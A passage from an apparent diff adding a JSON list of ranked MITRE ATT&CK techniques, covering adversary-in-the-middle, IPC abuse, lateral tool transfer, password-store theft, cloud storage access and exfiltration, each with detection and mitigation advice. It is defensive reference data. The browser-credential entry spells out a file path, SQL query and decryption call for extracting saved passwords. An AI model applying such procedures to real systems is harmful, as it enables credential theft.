1.2908688518133333, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ], + "subtechniques": [ + { + "tid": "T1557.001", + "name": "Adversary-in-the-Middle: LLMNR/NBT-NS Poisoning and SMB Relay", + "description": "By responding to LLMNR/NBT-NS network traffic, adversaries may spoof an authoritative source for name resolution to force communication with an adversary controlled system. This activity may be used to collect or relay authentication materials. \nLink-Local Multicast Name Resolution (LLMNR) and NetBIOS Name Service (NBT-NS) are Microsoft Windows components that serve as alternate methods of host identification. LLMNR is based upon the Domain Name System (DNS) format and allows hosts on the same local link to perform name resolution for other hosts. NBT-NS identifies systems on a local network by their NetBIOS name. (Citation: Wikipedia LLMNR) (Citation: TechNet NetBIOS)\nAdversaries can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355)/NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that the victims will communicate with the adversary controlled system. If the requested host belongs to a resource that requires identification/authentication, the username and NTLMv2 hash will then be sent to the adversary controlled system. The adversary can then collect the hash information sent over the wire through tools that monitor the ports for traffic or through Network Sniffing and crack the hashes offline through Brute Force to obtain the plaintext passwords. In some cases where an adversary has access to a system that is in the authentication path between systems or when automated scans that use credentials attempt to authenticate to an adversary controlled system, the NTLMv2 hashes can be intercepted and relayed to access and execute code against a target system. The relay step can happen in conjunction with poisoning but may also be independent of it. (Citation: byt3bl33d3r NTLM Relaying)(Citation: Secure Ideas SMB Relay)\nSeveral tools exist that can be used to poison name services within local networks such as NBNSpoof, Metasploit, and Responder. (Citation: GitHub NBNSpoof) (Citation: Rapid7 LLMNR Spoofer) (Citation: GitHub Responder)", + "url": "https://attack.mitre.org/techniques/T1557/001", + "detection": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of “0” indicates LLMNR is disabled. (Citation: Sternsecurity LLMNR-NBTNS)\nMonitor for traffic on ports UDP 5355 and UDP 137 if LLMNR/NetBIOS is disabled by security policy.\nDeploy an LLMNR/NBT-NS spoofing detection tool.(Citation: GitHub Conveigh) Monitoring of Windows event logs for event IDs 4697 and 7045 may help in detecting successful relay techniques.(Citation: Secure Ideas SMB Relay)", + "mitigations": [ + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1557.002", + "name": "Adversary-in-the-Middle: ARP Cache Poisoning", + "description": "Adversaries may poison Address Resolution Protocol (ARP) caches to position themselves between the communication of two or more networked devices. This activity may be used to enable follow-on behaviors such as Network Sniffing or Transmitted Data Manipulation.\nThe ARP protocol is used to resolve IPv4 addresses to link layer addresses, such as a media access control (MAC) address.(Citation: RFC826 ARP) Devices in a local network segment communicate with each other by using link layer addresses. If a networked device does not have the link layer address of a particular networked device, it may send out a broadcast ARP request to the local network to translate the IP address to a MAC address. The device with the associated IP address directly replies with its MAC address. The networked device that made the ARP request will then use as well as store that information in its ARP cache.\nAn adversary may passively wait for an ARP request to poison the ARP cache of the requesting device. The adversary may reply with their MAC address, thus deceiving the victim by making them believe that they are communicating with the intended networked device. For the adversary to poison the ARP cache, their reply must be faster than the one made by the legitimate IP address owner. Adversaries may also send a gratuitous ARP reply that maliciously announces the ownership of a particular IP address to all the devices in the local network segment.\nThe ARP protocol is stateless and does not require authentication. Therefore, devices may wrongly add or update the MAC address of the IP address in their ARP cache.(Citation: Sans ARP Spoofing Aug 2003)(Citation: Cylance Cleaver)\nAdversaries may use ARP cache poisoning as a means to intercept network traffic. This activity may be used to collect and/or relay data such as credentials, especially those sent over an insecure, unencrypted protocol.(Citation: Sans ARP Spoofing Aug 2003)", + "url": "https://attack.mitre.org/techniques/T1557/002", + "detection": "Monitor network traffic for unusual ARP traffic, gratuitous ARP replies may be suspicious. \nConsider collecting changes to ARP caches across endpoints for signs of ARP poisoning. For example, if multiple IP addresses map to a single MAC address, this could be an indicator that the ARP cache has been poisoned.", + "mitigations": [ + { + "mid": "M1017", + "name": "User Training", + "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.", + "url": "https://attack.mitre.org/mitigations/M1017" + }, + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1035", + "name": "Limit Access to Resource Over Network", + "description": "Prevent access to file shares, remote access to systems, unnecessary services. Mechanisms to limit access may include use of network concentrators, RDP gateways, etc.", + "url": "https://attack.mitre.org/mitigations/M1035" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + } + ] + }, + { + "rank": 33, + "tid": "T1559", + "name": "Inter-Process Communication", + "description": "Adversaries may abuse inter-process communication (IPC) mechanisms for local code or command execution. IPC is typically used by processes to share data, communicate with each other, or synchronize execution. IPC is also commonly used to avoid situations such as deadlocks, which occurs when processes are stuck in a cyclic waiting pattern. \nAdversaries may abuse IPC to execute arbitrary code or commands. IPC mechanisms may differ depending on OS, but typically exists in a form accessible through programming languages/libraries or native interfaces such as Windows Dynamic Data Exchange or Component Object Model. Higher level execution mediums, such as those of Command and Scripting Interpreters, may also leverage underlying IPC mechanisms. Adversaries may also use Remote Services such as Distributed Component Object Model to facilitate remote IPC execution.(Citation: Fireeye Hunting COM June 2019)", + "url": "https://attack.mitre.org/techniques/T1559", + "detection": "Monitor for strings in files/commands, loaded DLLs/libraries, or spawned processes that are associated with abuse of IPC mechanisms.", + "score": 1.2861593724371427, + "process_score": 0.2, + "file_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ], + "subtechniques": [ + { + "tid": "T1559.001", + "name": "Inter-Process Communication: Component Object Model", + "description": "Adversaries may use the Windows Component Object Model (COM) for local code execution. COM is an inter-process communication (IPC) component of the native Windows application programming interface (API) that enables interaction between software objects, or executable code that implements one or more interfaces.(Citation: Fireeye Hunting COM June 2019) Through COM, a client object can call methods of server objects, which are typically binary Dynamic Link Libraries (DLL) or executables (EXE).(Citation: Microsoft COM) Remote COM execution is facilitated by Remote Services such as Distributed Component Object Model (DCOM).(Citation: Fireeye Hunting COM June 2019)\nVarious COM interfaces are exposed that can be abused to invoke arbitrary execution via a variety of programming languages such as C, C++, Java, and Visual Basic.(Citation: Microsoft COM) Specific COM objects also exist to directly perform functions beyond code execution, such as creating a Scheduled Task/Job, fileless download/execution, and other adversary behaviors related to privilege escalation and persistence.(Citation: Fireeye Hunting COM June 2019)(Citation: ProjectZero File Write EoP Apr 2018)", + "url": "https://attack.mitre.org/techniques/T1559/001", + "detection": "Monitor for COM objects loading DLLs and other modules not typically associated with the application.(Citation: Enigma Outlook DCOM Lateral Movement Nov 2017) Enumeration of COM objects, via Query Registry or PowerShell, may also proceed malicious use.(Citation: Fireeye Hunting COM June 2019)(Citation: Enigma MMC20 COM Jan 2017)\nMonitor for spawning of processes associated with COM objects, especially those invoked by a user different than the one currently logged on. ", + "mitigations": [ + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + } + ] + }, + { + "tid": "T1559.002", + "name": "Inter-Process Communication: Dynamic Data Exchange", + "description": "Adversaries may use Windows Dynamic Data Exchange (DDE) to execute arbitrary commands. DDE is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.\nObject Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by Component Object Model, DDE may be enabled in Windows 10 and most of Microsoft Office 2016 via Registry keys. (Citation: BleepingComputer DDE Disabled in Word Dec 2017) (Citation: Microsoft ADV170021 Dec 2017) (Citation: Microsoft DDE Advisory Nov 2017)\nMicrosoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014), directly or through embedded files (Citation: Enigma Reviving DDE Jan 2018), and used to deliver execution via Phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to a Command and Scripting Interpreter. DDE execution can be invoked remotely via Remote Services such as Distributed Component Object Model (DCOM).(Citation: Fireeye Hunting COM June 2019)", + "url": "https://attack.mitre.org/techniques/T1559/002", + "detection": "Monitor processes for abnormal behavior indicative of DDE abuse, such as Microsoft Office applications loading DLLs and other modules not typically associated with the application or these applications spawning unusual processes (such as cmd.exe).\nOLE and Office Open XML files can be scanned for ‘DDEAUTO', ‘DDE’, and other strings indicative of DDE execution.(Citation: NVisio Labs DDE Detection Oct 2017)", + "mitigations": [ + { + "mid": "M1040", + "name": "Behavior Prevention on Endpoint", + "description": "Use capabilities to prevent suspicious behavior patterns from occurring on endpoint systems. This could include suspicious process, file, API call, etc. behavior.", + "url": "https://attack.mitre.org/mitigations/M1040" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + } + ] + }, + { + "rank": 34, + "tid": "T1570", + "name": "Lateral Tool Transfer", + "description": "Adversaries may transfer tools or other files between systems in a compromised environment. Files may be copied from one system to another to stage adversary tools or other files over the course of an operation. Adversaries may copy files laterally between internal victim systems to support lateral movement using inherent file sharing protocols such as file sharing over SMB to connected network shares or with authenticated connections with SMB/Windows Admin Shares or Remote Desktop Protocol. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.", + "url": "https://attack.mitre.org/techniques/T1570", + "detection": "Monitor for file creation and files transferred within a network using protocols such as SMB. Unusual processes with internal network connections creating files on-system may be suspicious. Consider monitoring for abnormal usage of utilities and command-line arguments that may be used in support of remote transfer of files. Considering monitoring for alike file hashes or characteristics (ex: filename) that are created on multiple hosts.", + "score": 1.2729806215885715, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1031", + "name": "Network Intrusion Prevention", + "description": "Use intrusion detection signatures to block traffic at network boundaries.", + "url": "https://attack.mitre.org/mitigations/M1031" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + } + ], + "subtechniques": [] + }, + { + "rank": 35, + "tid": "T1210", + "name": "Exploitation of Remote Services", + "description": "Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.\nAn adversary may need to determine if the remote system is in a vulnerable state, which may be done through Network Service Scanning or other Discovery methods looking for common, vulnerable software that may be deployed in the network, the lack of certain patches that may indicate vulnerabilities, or security software that may be used to detect or contain remote exploitation. Servers are likely a high value target for lateral movement exploitation, but endpoint systems may also be at risk if they provide an advantage or access to additional resources.\nThere are several well-known vulnerabilities that exist in common services such as SMB (Citation: CIS Multiple SMB Vulnerabilities) and RDP (Citation: NVD CVE-2017-0176) as well as applications that may be used within internal networks such as MySQL (Citation: NVD CVE-2016-6662) and web server services. (Citation: NVD CVE-2014-7169)\nDepending on the permissions level of the vulnerable remote service an adversary may achieve Exploitation for Privilege Escalation as a result of lateral movement exploitation as well.", + "url": "https://attack.mitre.org/techniques/T1210", + "detection": "Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash. Also look for behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of the processes. This could include suspicious files written to disk, evidence of Process Injection for attempts to hide execution, evidence of Discovery, or other unusual network traffic that may indicate additional tools transferred to the system.", + "score": 1.2585666666666666, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1016", + "name": "Vulnerability Scanning", + "description": "Vulnerability scanning is used to find potentially exploitable software vulnerabilities to remediate them.", + "url": "https://attack.mitre.org/mitigations/M1016" + }, + { + "mid": "M1019", + "name": "Threat Intelligence Program", + "description": "A threat intelligence program helps an organization generate their own threat intelligence information and track trends to inform defensive priorities to mitigate risk.", + "url": "https://attack.mitre.org/mitigations/M1019" + }, + { + "mid": "M1026", + "name": "Privileged Account Management", + "description": "Manage the creation, modification, use, and permissions associated to privileged accounts, including SYSTEM and root.", + "url": "https://attack.mitre.org/mitigations/M1026" + }, + { + "mid": "M1030", + "name": "Network Segmentation", + "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.", + "url": "https://attack.mitre.org/mitigations/M1030" + }, + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + }, + { + "mid": "M1048", + "name": "Application Isolation and Sandboxing", + "description": "Restrict execution of code to a virtual environment on or in transit to an endpoint system.", + "url": "https://attack.mitre.org/mitigations/M1048" + }, + { + "mid": "M1050", + "name": "Exploit Protection", + "description": "Use capabilities to detect and block conditions that may lead to or be indicative of a software exploit occurring.", + "url": "https://attack.mitre.org/mitigations/M1050" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + } + ], + "subtechniques": [] + }, + { + "rank": 36, + "tid": "T1555", + "name": "Credentials from Password Stores", + "description": "Adversaries may search for common password storage locations to obtain user credentials. Passwords are stored in several places on a system, depending on the operating system or application holding the credentials. There are also specific applications that store passwords to make it easier for users manage and maintain. Once credentials are obtained, they can be used to perform lateral movement and access restricted information.", + "url": "https://attack.mitre.org/techniques/T1555", + "detection": "Monitor system calls, file read events, and processes for suspicious activity that could indicate searching for a password or other activity related to performing keyword searches (e.g. password, pwd, login, store, secure, credentials, etc.) in process memory for credentials. File read events should be monitored surrounding known password storage applications.", + "score": 1.2480607721104762, + "network_score": 0.2, + "process_score": 0.2, + "file_score": 0.2, + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ], + "subtechniques": [ + { + "tid": "T1555.001", + "name": "Credentials from Password Stores: Keychain", + "description": "Adversaries may collect the keychain storage data from a system to acquire credentials. Keychains are the built-in way for macOS to keep track of users' passwords and credentials for many services and features such as WiFi passwords, websites, secure notes, certificates, and Kerberos. Keychain files are located in ~/Library/Keychains/,/Library/Keychains/, and /Network/Library/Keychains/. (Citation: Wikipedia keychain) The security command-line utility, which is built into macOS by default, provides a useful way to manage these credentials.\nTo manage their credentials, users have to use additional credentials to access their keychain. If an adversary knows the credentials for the login keychain, then they can get access to all the other credentials stored in this vault. (Citation: External to DA, the OS X Way) By default, the passphrase for the keychain is the user’s logon credentials.", + "url": "https://attack.mitre.org/techniques/T1555/001", + "detection": "Unlocking the keychain and using passwords from it is a very common process, so there is likely to be a lot of noise in any detection technique. Monitoring of system calls to the keychain can help determine if there is a suspicious process trying to access it.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1555.002", + "name": "Credentials from Password Stores: Securityd Memory", + "description": "An adversary may obtain root access (allowing them to read securityd’s memory), then they can scan through memory to find the correct sequence of keys in relatively few tries to decrypt the user’s logon keychain. This provides the adversary with all the plaintext passwords for users, WiFi, mail, browsers, certificates, secure notes, etc.(Citation: OS X Keychain) (Citation: OSX Keydnap malware)\nIn OS X prior to El Capitan, users with root access can read plaintext keychain passwords of logged-in users because Apple’s keychain implementation allows these credentials to be cached so that users are not repeatedly prompted for passwords. (Citation: OS X Keychain) (Citation: External to DA, the OS X Way) Apple’s securityd utility takes the user’s logon password, encrypts it with PBKDF2, and stores this master key in memory. Apple also uses a set of keys and algorithms to encrypt the user’s password, but once the master key is found, an attacker need only iterate over the other values to unlock the final password.(Citation: OS X Keychain)", + "url": "https://attack.mitre.org/techniques/T1555/002", + "detection": "Monitor processes and command-line arguments for activity surrounded users searching for credentials or using automated tools to scan memory for passwords.", + "mitigations": [] + }, + { + "tid": "T1555.003", + "name": "Credentials from Password Stores: Credentials from Web Browsers", + "description": "Adversaries may acquire credentials from web browsers by reading files specific to the target browser.(Citation: Talos Olympic Destroyer 2018) Web browsers commonly save credentials such as website usernames and passwords so that they do not need to be entered manually in the future. Web browsers typically store the credentials in an encrypted format within a credential store; however, methods exist to extract plaintext credentials from web browsers.\nFor example, on Windows systems, encrypted credentials may be obtained from Google Chrome by reading a database file, AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data and executing a SQL query: SELECT action_url, username_value, password_value FROM logins;. The plaintext password can then be obtained by passing the encrypted credentials to the Windows API function CryptUnprotectData, which uses the victim’s cached logon credentials as the decryption key. (Citation: Microsoft CryptUnprotectData April 2018)\nAdversaries have executed similar procedures for common web browsers such as FireFox, Safari, Edge, etc.(Citation: Proofpoint Vega Credential Stealer May 2018)(Citation: FireEye HawkEye Malware July 2017) Windows stores Internet Explorer and Microsoft Edge credentials in Credential Lockers managed by the Windows Credential Manager.\nAdversaries may also acquire credentials by searching web browser process memory for patterns that commonly match credentials.(Citation: GitHub Mimikittenz July 2016)\nAfter acquiring credentials from web browsers, adversaries may attempt to recycle the credentials across different systems and/or accounts in order to expand access. This can result in significantly furthering an adversary's objective in cases where credentials gained from web browsers overlap with privileged accounts (e.g. domain administrator).", + "url": "https://attack.mitre.org/techniques/T1555/003", + "detection": "Identify web browser files that contain credentials such as Google Chrome’s Login Data database file: AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data. Monitor file read events of web browser files that contain credentials, especially when the reading process is unrelated to the subject web browser. Monitor process execution logs to include PowerShell Transcription focusing on those that perform a combination of behaviors including reading web browser process memory, utilizing regular expressions, and those that contain numerous keywords for common web applications (Gmail, Twitter, Office365, etc.).", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + } + ] + }, + { + "tid": "T1555.004", + "name": "Credentials from Password Stores: Windows Credential Manager", + "description": "Adversaries may acquire credentials from the Windows Credential Manager. The Credential Manager stores credentials for signing into websites, applications, and/or devices that request authentication through NTLM or Kerberos in Credential Lockers (previously known as Windows Vaults).(Citation: Microsoft Credential Manager store)(Citation: Microsoft Credential Locker)\nThe Windows Credential Manager separates website credentials from application or network credentials in two lockers. As part of Credentials from Web Browsers, Internet Explorer and Microsoft Edge website credentials are managed by the Credential Manager and are stored in the Web Credentials locker. Application and network credentials are stored in the Windows Credentials locker.\nCredential Lockers store credentials in encrypted .vcrd files, located under %Systemdrive%\\Users\\[Username]\\AppData\\Local\\Microsoft\\[Vault/Credentials]\\. The encryption key can be found in a file named Policy.vpol, typically located in the same folder as the credentials.(Citation: passcape Windows Vault)(Citation: Malwarebytes The Windows Vault)\nAdversaries may list credentials managed by the Windows Credential Manager through several mechanisms. vaultcmd.exe is a native Windows executable that can be used to enumerate credentials stored in the Credential Locker through a command-line interface. Adversaries may gather credentials by reading files located inside of the Credential Lockers. Adversaries may also abuse Windows APIs such as CredEnumerateA to list credentials managed by the Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\nAdversaries may use password recovery tools to obtain plain text passwords from the Credential Manager.(Citation: Malwarebytes The Windows Vault)", + "url": "https://attack.mitre.org/techniques/T1555/004", + "detection": "Monitor process and command-line parameters of vaultcmd.exe for suspicious activity, such as listing credentials from the Windows Credentials locker (i.e., vaultcmd /listcreds:“Windows Credentials”).(Citation: Malwarebytes The Windows Vault)\nConsider monitoring API calls such as CredEnumerateA that may list credentials from the Windows Credential Manager.(Citation: Microsoft CredEnumerate)(Citation: Delpy Mimikatz Crendential Manager)\nConsider monitoring file reads to Vault locations, %Systemdrive%\\Users\\[Username]\\AppData\\Local\\Microsoft\\[Vault/Credentials]\\, for suspicious activity.(Citation: Malwarebytes The Windows Vault)", + "mitigations": [ + { + "mid": "M1042", + "name": "Disable or Remove Feature or Program", + "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.", + "url": "https://attack.mitre.org/mitigations/M1042" + } + ] + }, + { + "tid": "T1555.005", + "name": "Credentials from Password Stores: Password Managers", + "description": "Adversaries may acquire user credentials from third-party password managers.(Citation: ise Password Manager February 2019) Password managers are applications designed to store user credentials, normally in an encrypted database. Credentials are typically accessible after a user provides a master password that unlocks the database. After the database is unlocked, these credentials may be copied to memory. These databases can be stored as files on disk.(Citation: ise Password Manager February 2019)\nAdversaries may acquire user credentials from password managers by extracting the master password and/or plain-text credentials from memory.(Citation: FoxIT Wocao December 2019)(Citation: Github KeeThief) Adversaries may extract credentials from memory via Exploitation for Credential Access.(Citation: NVD CVE-2019-3610)\n Adversaries may also try brute forcing via Password Guessing to obtain the master password of a password manager.(Citation: Cyberreason Anchor December 2019)", + "url": "https://attack.mitre.org/techniques/T1555/005", + "detection": "Consider monitoring API calls, file read events, and processes for suspicious activity that could indicate searching in process memory of password managers. \nConsider monitoring file reads surrounding known password manager applications.", + "mitigations": [ + { + "mid": "M1027", + "name": "Password Policies", + "description": "Set and enforce secure password policies for accounts.", + "url": "https://attack.mitre.org/mitigations/M1027" + }, + { + "mid": "M1051", + "name": "Update Software", + "description": "Perform regular software updates to mitigate exploitation risk.", + "url": "https://attack.mitre.org/mitigations/M1051" + }, + { + "mid": "M1054", + "name": "Software Configuration", + "description": "Implement configuration changes to software (other than the operating system) to mitigate security risks associated to how the software operates.", + "url": "https://attack.mitre.org/mitigations/M1054" + } + ] + } + ] + }, + { + "rank": 37, + "tid": "T1530", + "name": "Data from Cloud Storage Object", + "description": "Adversaries may access data objects from improperly secured cloud storage.\nMany cloud service providers offer solutions for online data storage such as Amazon S3, Azure Storage, and Google Cloud Storage. These solutions differ from other storage solutions (such as SQL or Elasticsearch) in that there is no overarching application. Data from these solutions can be retrieved directly using the cloud provider's APIs. Solution providers typically offer security guides to help end users configure systems.(Citation: Amazon S3 Security, 2019)(Citation: Microsoft Azure Storage Security, 2019)(Citation: Google Cloud Storage Best Practices, 2019)\nMisconfiguration by end users is a common problem. There have been numerous incidents where cloud storage has been improperly secured (typically by unintentionally allowing public access by unauthenticated users or overly-broad access by all users), allowing open access to credit cards, personally identifiable information, medical records, and other sensitive information.(Citation: Trend Micro S3 Exposed PII, 2017)(Citation: Wired Magecart S3 Buckets, 2019)(Citation: HIPAA Journal S3 Breach, 2017) Adversaries may also obtain leaked credentials in source repositories, logs, or other means as a way to gain access to cloud storage objects that have access permission controls.", + "url": "https://attack.mitre.org/techniques/T1530", + "detection": "Monitor for unusual queries to the cloud provider's storage service. Activity originating from unexpected sources may indicate improper permissions are set that is allowing access to data. Additionally, detecting failed attempts by a user for a certain object, followed by escalation of privileges by the same user, and access to the same object may be an indication of suspicious activity.", + "score": 1.2476190476190476, + "network_score": 0.2, + "process_score": 0.2, + "hardware_score": 0.2, + "mitigations": [ + { + "mid": "M1018", + "name": "User Account Management", + "description": "Manage the creation, modification, use, and permissions associated to user accounts.", + "url": "https://attack.mitre.org/mitigations/M1018" + }, + { + "mid": "M1022", + "name": "Restrict File and Directory Permissions", + "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.", + "url": "https://attack.mitre.org/mitigations/M1022" + }, + { + "mid": "M1032", + "name": "Multi-factor Authentication", + "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.", + "url": "https://attack.mitre.org/mitigations/M1032" + }, + { + "mid": "M1037", + "name": "Filter Network Traffic", + "description": "Use network appliances to filter ingress or egress traffic and perform protocol-based filtering. Configure software on endpoints to filter network traffic.", + "url": "https://attack.mitre.org/mitigations/M1037" + }, + { + "mid": "M1041", + "name": "Encrypt Sensitive Information", + "description": "Protect sensitive information with strong encryption.", + "url": "https://attack.mitre.org/mitigations/M1041" + }, + { + "mid": "M1047", + "name": "Audit", + "description": "Perform audits or scans of systems, permissions, insecure software, insecure configurations, etc. to identify potential weaknesses.", + "url": "https://attack.mitre.org/mitigations/M1047" + } + ], + "subtechniques": [] + }, + { + "rank": 38, + "tid": "T1048", + "name": "Exfiltration Over Alternative Protocol", + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may also opt to encrypt and/or obfuscate these alternate channels. \nExfiltration Over Alternative Protocol can be done using various common operating system utilities such as Net/SMB or FTP.(Citation: Palo Alto OilRig Oct 2016) On macOS and Linux curl may be used to invoke protocols such as HTTP/S or FTP/S to exfiltrate data from a system.(Citation: 20 macOS Common Tools and Techniques) ", + "url": 